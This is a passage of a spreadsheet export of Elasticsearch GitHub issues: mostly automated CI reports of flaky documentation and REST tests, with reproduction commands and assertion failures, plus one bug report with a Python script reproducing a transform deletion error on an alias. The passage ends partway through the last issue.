  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121611</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_488} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6345 / rocky-8_platform-support-unix](https://gradle-enterprise.elastic.co/s/5rwxstwztm3ic) - [elasticsearch-pull-request #56262 / part-1-entitlements](https://gradle-enterprise.elastic.co/s/osvtjkh6xtidi) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_488}" -Dtests.seed=CB9D0099C8C38A7E -Dtests.locale=cs -Dtests.timezone=Europe/Belfast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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fsnapshot-restore%2Fapis%2Fget-snapshot-api%2Fline_488%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/snapshot-restore/apis/get-snapshot-api:197]: Expected a map containing snapshots: a list containing 0: a map containing failures: an empty list include_global_state: &lt;true&gt; end_time: "2025-02-12T13:12:14.312Z" duration_in_millis: &lt;0&gt; version_id: &lt;9010000&gt; repository: "my_repository" uuid: "vB4VLr-ISbqKfM6qTK-KNA" version: "9.1.0" start_time: "2025-02-12T13:12:14.312Z" shards: a map containing total: expected &lt;0&gt; but was &lt;1&gt; failed: &lt;0&gt; successful: expected &lt;0&gt; but was &lt;1&gt; indices: an empty list 0: &lt;unexpected&gt; but was ".security-7" feature_states: an empty list 0: &lt;unexpected&gt; but was &lt;{feature_name=security, indices=[.security-7]}&gt; start_time_in_millis: &lt;1739365934312L&gt; data_streams: an empty list [truncated]  **Issue Reasons:** - [main] 2 failures in test test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_488} (0.7% fail rate in 281 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121642</t>
  </si>
  <si>
    <t>[CI] UpgradeClusterClientYamlTestSuiteIT test {p0=mixed_cluster/110_enrich/Enrich stats query smoke test for mixed cluster} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #17194 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/uum4u2zrfn3ru) - [elasticsearch-pull-request #54825 / 9.0.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/lsx6jyeqi324y) - [elasticsearch-pull-request #54812 / 8.19.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/kovqf4jwxrjqm) - [elasticsearch-pull-request #54811 / 8.19.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/xibybi4mpqvgg) - [elasticsearch-pull-request #54780 / 8.19.0_bwc-snapshots](https://gradle-enterprise.elastic.co/s/npg7zqhurdr5o) **Reproduction Line:**  ./gradlew ":x-pack:qa:rolling-upgrade:v9.0.0#twoThirdsUpgradedTest" -Dtests.class="org.elasticsearch.upgrades.UpgradeClusterClientYamlTestSuiteIT" -Dtests.method="test {p0=mixed_cluster/110_enrich/Enrich stats query smoke test for mixed cluster}" -Dtests.seed=68B1B51BE52BA06E -Dtests.bwc=true -Dtests.locale=mk -Dtests.timezone=America/Indiana/Petersburg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upgrades.UpgradeClusterClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dmixed_cluster%2F110_enrich%2FEnrich%20stats%20query%20smoke%20test%20for%20mixed%20cluster%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [mixed_cluster/110_enrich:7]: expected [2xx] status code but api [enrich.stats] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"e_o_f_exception","reason":null,"stack_trace":"org.elasticsearch.ElasticsearchException$1\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:725)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:639)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.build(RestResponse.java:202)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:161)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:122)\n\tat org.elasticsearch.server@9.0.0-SNAPSHOT/org.elasticsearch.rest.action.RestActionListener.onFailure(Res [truncated]  **Issue Reasons:** - [main] 5 failures in test test {p0=mixed_cluster/110_enrich/Enrich stats query smoke test for mixed cluster} (1.0% fail rate in 492 executions) - [main] 2 failures in step 9.0.0_bwc-snapshots (1.4% fail rate in 144 executions) - [main] 3 failures in step 8.19.0_bwc-snapshots (2.0% fail rate in 153 executions) - [main] 4 failures in pipeline elasticsearch-pull-request (3.4% fail rate in 118 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121748</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/rest-api/common-options/line_102} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #18819 / part1](https://gradle-enterprise.elastic.co/s/rt4jp5olxxf6w) - [elasticsearch-periodic-platform-support #6579 / sles-15_platform-support-unix](https://gradle-enterprise.elastic.co/s/qjb4sv44vz642) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/rest-api/common-options/line_102}" -Dtests.seed=EFE33FF79FD1A078 -Dtests.locale=nl-SR -Dtests.timezone=US/Arizona -Druntime.java=23  **Applicable branches:** 8.18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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Frest-api%2Fcommon-options%2Fline_102%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/rest-api/common-options:94]: Expected a map containing metadata: a map containing indices: a map containing my-index-000001: a map containing state: "open" .security-7: &lt;unexpected&gt; but was &lt;{state=open}&gt;  **Issue Reasons:** - [8.18] 2 failures in test test {yaml=reference/rest-api/common-options/line_102} (0.8% fail rate in 260 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121867</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/cat/health/cat-health-no-timestamp-example} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #17410 / part1](https://gradle-enterprise.elastic.co/s/5qblqqsi3g5yq) - [elasticsearch-pull-request #54869 / part-1](https://gradle-enterprise.elastic.co/s/nkrh3lw6zc7ea) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/cat/health/cat-health-no-timestamp-example}" -Dtests.seed=98C37C414D2BA002 -Dtests.locale=en-AS -Dtests.timezone=Turkey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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fcat%2Fhealth%2Fcat-health-no-timestamp-example%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/cat/health:48]: field [$body] was expected to match the provided regex but didn't Expected: cluster \s+status \s+node.total \s+node.data \s+shards \s+pri \s+relo \s+init \s+unassign \s+unassign.pri \s+pending_tasks \s+max_task_wait_time \s+active_shards_percent\s* [^ \s+]+ \s+green \s+1 \s+1 \s+1 \s+1 \s+0 \s+0 \s+0 \s+0 \s+\d+ \s+(-|\d+(\.\d+)?[ms]+) \s+100.0%\s* but: was "cluster status node.total node.data shards pri relo init unassign unassign.pri pending_tasks max_task_wait_time active_shards_percent\nyamlRestTest green 1 1 2 2 0 0 0 0 0 - 100.0%\n"  **Issue Reasons:** - [main] 2 failures in test test {yaml=reference/cat/health/cat-health-no-timestamp-example} (0.5% fail rate in 373 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121913</t>
  </si>
  <si>
    <t>[Transform] Delete API fails when destination index writes to alias</t>
  </si>
  <si>
    <t xml:space="preserve">When a transform writes to an alias, calling the Delete API with `delete_dest_index` throws an IllegalArgumentException: python BadRequestError: BadRequestError(400, 'illegal_argument_exception', 'The provided expression [dice-rolls-write] matches an alias, specify the corresponding concrete indices instead.')  python from elasticsearch import Elasticsearch import os from datetime import datetime, timezone import numpy as np import time # Initialize Client es_url = os.getenv("ES_URL", "http://localhost:9200") es_user = os.getenv("ES_USERNAME", "elastic") es_password = os.getenv("ES_PASSWORD", "password") es = Elasticsearch( hosts=es_url, basic_auth=(es_user, es_password), verify_certs=False, ssl_show_warn=False ) es.cluster.put_settings( flat_settings="true", body={"transient": {"logger.org.elasticsearch.xpack.transform.transforms": "debug"}}, ) source_index="random-dice" dest_index="dice-rolls" dest_index_alias="dice-rolls-write" transform_id="dice-rolls" print("Loading first value into index") print(es.index(index=source_index, document={ 'value': np.random.randint(1,21), 'time': datetime.now(timezone.utc) })) print("Creating Index &amp; Alias") print(es.indices.create(index=dest_index)) print(es.indices.update_aliases( actions=[ { "add": { "index": dest_index, "alias": dest_index_alias } } ], )) print("Creating Transform") es.transform.put_transform( transform_id=transform_id, source={ "index": source_index }, dest={ "index": dest_index_alias }, pivot={ "group_by": { "dice value": { "terms": { "field": "value", "missing_bucket": True } } }, "aggregations": { "occurrences": { "value_count": { "field": "value" } } } }, frequency= "5s", sync= { "time": { "field": "time", "delay": "5s" } } ) print("Starting Transform") print(es.transform.start_transform( transform_id=transform_id )) print("Stopping Transform") print(es.transform.stop_transform( transform_id=transform_id, wait_for_completion=True )) print("Deleting Transform") print(es.transform.delete_transform( transform_id=transform_id, delete_dest_index=True )) </t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121964</t>
  </si>
  <si>
    <t>[CI] ClientYamlTestSuiteIT test {yaml=update/100_synthetic_source/stored text} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #6263 / release-tests](https://gradle-enterprise.elastic.co/s/kizukaquwp56s) - [elasticsearch-periodic #6256 / release-tests](https://gradle-enterprise.elastic.co/s/q3l6omrj2x5b4) - [elasticsearch-periodic #6249 / release-tests](https://gradle-enterprise.elastic.co/s/ukda2b6mc7jzy) - [elasticsearch-periodic #6242 / release-tests](https://gradle-enterprise.elastic.co/s/tknr42c2zk5k4) - [elasticsearch-periodic #6235 / release-tests](https://gradle-enterprise.elastic.co/s/l72i2hpot2xai) **Reproduction Line:**  ./gradlew ":rest-api-spec:yamlRestTest" --tests "org.elasticsearch.test.rest.ClientYamlTestSuiteIT.test {yaml=update/100_synthetic_source/keyword}" -Dtests.seed=F77F69713874A3AB -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=dje -Dtests.timezone=GB-Eire -Druntime.java=23  **Applicable branches:** 8.x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test.rest.ClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dupdate%2F100_synthetic_source%2Fstored%20text%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [update/100_synthetic_source:64]: field [test.fields._recovery_source] should be null but was [{total=74b, total_in_bytes=74, inverted_index={total=0b, total_in_bytes=0}, stored_fields=74b, stored_fields_in_bytes=74, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}] expected null, but was:&lt;{total=74b, total_in_bytes=74, inverted_index={total=0b, total_in_bytes=0}, stored_fields=74b, stored_fields_in_bytes=74, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}&gt;  **Issue Reasons:** - [8.x] 5 consecutive failures in step release-tests - [8.x] 5 failures in test test {yaml=update/100_synthetic_source/stored text} (2.4% fail rate in 206 executions) - [8.x] 5 failures in step release-tests (100.0% fail rate in 5 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (100.0% fail rate in 5 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121965</t>
  </si>
  <si>
    <t>[CI] ClientYamlTestSuiteIT test {yaml=update/100_synthetic_source/keyword} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #6263 / release-tests](https://gradle-enterprise.elastic.co/s/kizukaquwp56s) - [elasticsearch-periodic #6256 / release-tests](https://gradle-enterprise.elastic.co/s/q3l6omrj2x5b4) - [elasticsearch-periodic #6249 / release-tests](https://gradle-enterprise.elastic.co/s/ukda2b6mc7jzy) - [elasticsearch-periodic #6242 / release-tests](https://gradle-enterprise.elastic.co/s/tknr42c2zk5k4) - [elasticsearch-periodic #6235 / release-tests](https://gradle-enterprise.elastic.co/s/l72i2hpot2xai) **Reproduction Line:**  ./gradlew ":rest-api-spec:yamlRestTest" --tests "org.elasticsearch.test.rest.ClientYamlTestSuiteIT.test {yaml=update/100_synthetic_source/keyword}" -Dtests.seed=F77F69713874A3AB -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=dje -Dtests.timezone=GB-Eire -Druntime.java=23  **Applicable branches:** 8.x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test.rest.ClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dupdate%2F100_synthetic_source%2Fkeyword%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [update/100_synthetic_source:64]: field [test.fields._recovery_source] should be null but was [{total=74b, total_in_bytes=74, inverted_index={total=0b, total_in_bytes=0}, stored_fields=74b, stored_fields_in_bytes=74, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}] expected null, but was:&lt;{total=74b, total_in_bytes=74, inverted_index={total=0b, total_in_bytes=0}, stored_fields=74b, stored_fields_in_bytes=74, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}&gt;  **Issue Reasons:** - [8.x] 5 consecutive failures in step release-tests - [8.x] 5 failures in test test {yaml=update/100_synthetic_source/keyword} (2.4% fail rate in 206 executions) - [8.x] 5 failures in step release-tests (100.0% fail rate in 5 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (100.0% fail rate in 5 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/121976</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/cat/allocation/cat-allocation-example} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #18415 / part1](https://gradle-enterprise.elastic.co/s/4n6pijoggdkxs) - [elasticsearch-pull-request #57794 / part-1-entitlements](https://gradle-enterprise.elastic.co/s/tozsnmmpc3ixk) - [elasticsearch-pull-request #57150 / part-1-entitlements](https://gradle-enterprise.elastic.co/s/56orlklavne3s) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/cat/allocation/cat-allocation-example}" -Dtests.seed=1F1FBD4F9AF5F043 -Dtests.locale=tt-Cyrl-RU -Dtests.timezone=America/Cayenne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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fcat%2Fallocation%2Fcat-allocation-example%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/cat/allocation:22]: field [$body] was expected to match the provided regex but didn't Expected: shards \s+shards.undesired \s+write_load.forecast \s+disk.indices.forecast \s+disk.indices \s+disk.used \s+disk.avail \s+disk.total \s+disk.percent \s+host \s+ip \s+node \s+node.role\s* \s+1 \s+0 \s+0.0 \s+\d+(\.\d+)?[tgmk]?b \s+\d+(\.\d+)?[tgmk]?b \s+\d+(\.\d+)?[tgmk]?b \s+\d+(\.\d+)?[tgmk]?b \s+\d+(\.\d+)?[tgmk]?b \s+\d+ \s+127.0.0.1 \s+127.0.0.1 \s+.+\s* but: was "shards shards.undesired write_load.forecast disk.indices.forecast disk.indices disk.used disk.avail disk.total disk.percent host ip node node.role\n 2 0 0.0 43.1kb 43.4kb 8.3gb 50.5gb 58.9gb 14 127.0.0.1 127.0.0.1 node-0 cdfhilmrstw\n"  **Issue Reasons:** - [main] 3 failures in test test {yaml=reference/cat/allocation/cat-allocation-example} (0.3% fail rate in 998 executions) - [main] 2 failures in step part-1-entitlements (8.0% fail rate in 25 executions) - [main] 2 failures in pipeline elasticsearch-pull-request (0.4% fail rate in 458 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/122100</t>
  </si>
  <si>
    <t>[CI] CoreWithSecurityClientYamlTestSuiteIT test {yaml=update/100_synthetic_source/stored text} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #6258 / release-tests](https://gradle-enterprise.elastic.co/s/6ts4lc2j45ky2) - [elasticsearch-pull-request #55698 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/27ssy542foxn2) - [elasticsearch-pull-request #55672 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/rdvef6aipnmyw) - [elasticsearch-pull-request #55646 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/w7vnwjv7o5lp4) - [elasticsearch-pull-request #55486 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/ivmfy4pac6gpm) - [elasticsearch-pull-request #55436 / part-4-entitlements](https://gradle-enterprise.elastic.co/s/uroommvfhmglm) - [elasticsearch-pull-request #55424 / part-4-entitlements](https://gradle-enterprise.elastic.co/s/kxzwjrj3gk7fa) - [elasticsearch-pull-request #55073 / part-4](https://gradle-enterprise.elastic.co/s/5hpg7jcmvzlsi) - [elasticsearch-pull-request #54605 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/msp5ooslwhz5e) **Reproduction Line:**  ./gradlew ":x-pack:qa:core-rest-tests-with-security:yamlRestTest" --tests "org.elasticsearch.xpack.security.CoreWithSecurityClientYamlTestSuiteIT.test {yaml=update/100_synthetic_source/stored text}" -Dtests.seed=78EA00D2F5CB779A -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=tr-Latn-TR -Dtests.timezone=Asia/Hovd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xpack.security.CoreWithSecurityClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dupdate%2F100_synthetic_source%2Fstored%20text%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [update/100_synthetic_source:126]: field [test.fields._recovery_source] should be null but was [{total=110b, total_in_bytes=110, inverted_index={total=0b, total_in_bytes=0}, stored_fields=110b, stored_fields_in_bytes=110, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}] expected null, but was:&lt;{total=110b, total_in_bytes=110, inverted_index={total=0b, total_in_bytes=0}, stored_fields=110b, stored_fields_in_bytes=110, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}&gt;  **Issue Reasons:** - [main] 9 failures in test test {yaml=update/100_synthetic_source/stored text} (1.4% fail rate in 653 executions) - [main] 5 failures in step checkpart4_release-tests (71.4% fail rate in 7 executions) - [main] 2 failures in step part-4-entitlements (11.8% fail rate in 17 executions) - [main] 8 failures in pipeline elasticsearch-pull-request (3.0% fail rate in 268 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/122101</t>
  </si>
  <si>
    <t>[CI] CoreWithSecurityClientYamlTestSuiteIT test {yaml=update/100_synthetic_source/keyword} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #6258 / release-tests](https://gradle-enterprise.elastic.co/s/6ts4lc2j45ky2) - [elasticsearch-pull-request #55698 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/27ssy542foxn2) - [elasticsearch-pull-request #55672 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/rdvef6aipnmyw) - [elasticsearch-pull-request #55646 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/w7vnwjv7o5lp4) - [elasticsearch-pull-request #55486 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/ivmfy4pac6gpm) - [elasticsearch-pull-request #55436 / part-4-entitlements](https://gradle-enterprise.elastic.co/s/uroommvfhmglm) - [elasticsearch-pull-request #55424 / part-4-entitlements](https://gradle-enterprise.elastic.co/s/kxzwjrj3gk7fa) - [elasticsearch-pull-request #55073 / part-4](https://gradle-enterprise.elastic.co/s/5hpg7jcmvzlsi) - [elasticsearch-pull-request #54605 / checkpart4_release-tests](https://gradle-enterprise.elastic.co/s/msp5ooslwhz5e) **Reproduction Line:**  ./gradlew ":x-pack:qa:core-rest-tests-with-security:yamlRestTest" --tests "org.elasticsearch.xpack.security.CoreWithSecurityClientYamlTestSuiteIT.test {yaml=update/100_synthetic_source/stored text}" -Dtests.seed=78EA00D2F5CB779A -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=tr-Latn-TR -Dtests.timezone=Asia/Hovd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xpack.security.CoreWithSecurityClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dupdate%2F100_synthetic_source%2Fkeyword%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [update/100_synthetic_source:126]: field [test.fields._recovery_source] should be null but was [{total=110b, total_in_bytes=110, inverted_index={total=0b, total_in_bytes=0}, stored_fields=110b, stored_fields_in_bytes=110, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}] expected null, but was:&lt;{total=110b, total_in_bytes=110, inverted_index={total=0b, total_in_bytes=0}, stored_fields=110b, stored_fields_in_bytes=110, doc_values=0b, doc_values_in_bytes=0, points=0b, points_in_bytes=0, norms=0b, norms_in_bytes=0, term_vectors=0b, term_vectors_in_bytes=0, knn_vectors=0b, knn_vectors_in_bytes=0}&gt;  **Issue Reasons:** - [main] 9 failures in test test {yaml=update/100_synthetic_source/keyword} (1.4% fail rate in 653 executions) - [main] 5 failures in step checkpart4_release-tests (71.4% fail rate in 7 executions) - [main] 2 failures in step part-4-entitlements (11.8% fail rate in 17 executions) - [main] 8 failures in pipeline elasticsearch-pull-request (3.0% fail rate in 268 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/122335</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/cat/health/cat-health-example} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6338 / almalinux-8-aarch64_checkpart1_platform-support-arm](https://gradle-enterprise.elastic.co/s/gaec3qr32iwdk) - [elasticsearch-pull-request #56262 / part-1-entitlements](https://gradle-enterprise.elastic.co/s/osvtjkh6xtidi) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/cat/health/cat-health-example}" -Dtests.seed=DA73C881A87FFDDE -Dtests.locale=ak -Dtests.timezone=America/Grenada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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fcat%2Fhealth%2Fcat-health-example%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/cat/health:22]: field [$body] was expected to match the provided regex but didn't Expected: epoch \s+timestamp \s+cluster \s+status \s+node.total \s+node.data \s+shards \s+pri \s+relo \s+init \s+unassign \s+unassign.pri \s+pending_tasks \s+max_task_wait_time \s+active_shards_percent\s* \d+ \s+\d+:\d+:\d+ \s+[^ \s+]+ \s+green \s+1 \s+1 \s+1 \s+1 \s+0 \s+0 \s+0 \s+0 \s+\d+ \s+(-|\d+(\.\d+)?[ms]+) \s+100.0%\s* but: was "epoch timestamp cluster status node.total node.data shards pri relo init unassign unassign.pri pending_tasks max_task_wait_time active_shards_percent\n1739337859 05:24:19 yamlRestTest green 1 1 2 2 0 0 0 0 0 - 100.0%\n"  **Issue Reasons:** - [main] 2 failures in test test {yaml=reference/cat/health/cat-health-example} (0.8% fail rate in 260 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/122681</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_408} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #6408 / ubuntu-2404-aarch64_checkpart1_platform-support-arm](https://gradle-enterprise.elastic.co/s/d7oow2hbl76wy) - [elasticsearch-pull-request #57150 / part-1-entitlements](https://gradle-enterprise.elastic.co/s/56orlklavne3s) - [elasticsearch-pull-request #56915 / part-1-entitlements](https://gradle-enterprise.elastic.co/s/kozohf3vorivs) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/snapshot-restore/apis/get-snapshot-api/line_408}" -Dtests.seed=FDA54300A722D49E -Dtests.locale=pa-Guru-IN -Dtests.timezone=America/Miquelon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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fsnapshot-restore%2Fapis%2Fget-snapshot-api%2Fline_408%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [reference/snapshot-restore/apis/get-snapshot-api:125]: Expected a map containing snapshots: a list containing 0: a map containing failures: an empty list include_global_state: &lt;true&gt; end_time: "2025-02-15T13:21:02.126Z" duration_in_millis: &lt;0&gt; version_id: &lt;9010000&gt; repository: "my_repository" uuid: "ouqm63PsTgqOECwilH0i8w" version: "9.1.0" start_time: "2025-02-15T13:21:02.126Z" shards: a map containing total: expected &lt;0&gt; but was &lt;1&gt; failed: &lt;0&gt; successful: expected &lt;0&gt; but was &lt;1&gt; indices: an empty list 0: &lt;unexpected&gt; but was ".security-7" feature_states: an empty list 0: &lt;unexpected&gt; but was &lt;{feature_name=security, indices=[.security-7]}&gt; start_time_in_millis: &lt;1739625662126L&gt; data_streams: an empty list [truncated]  **Issue Reasons:** - 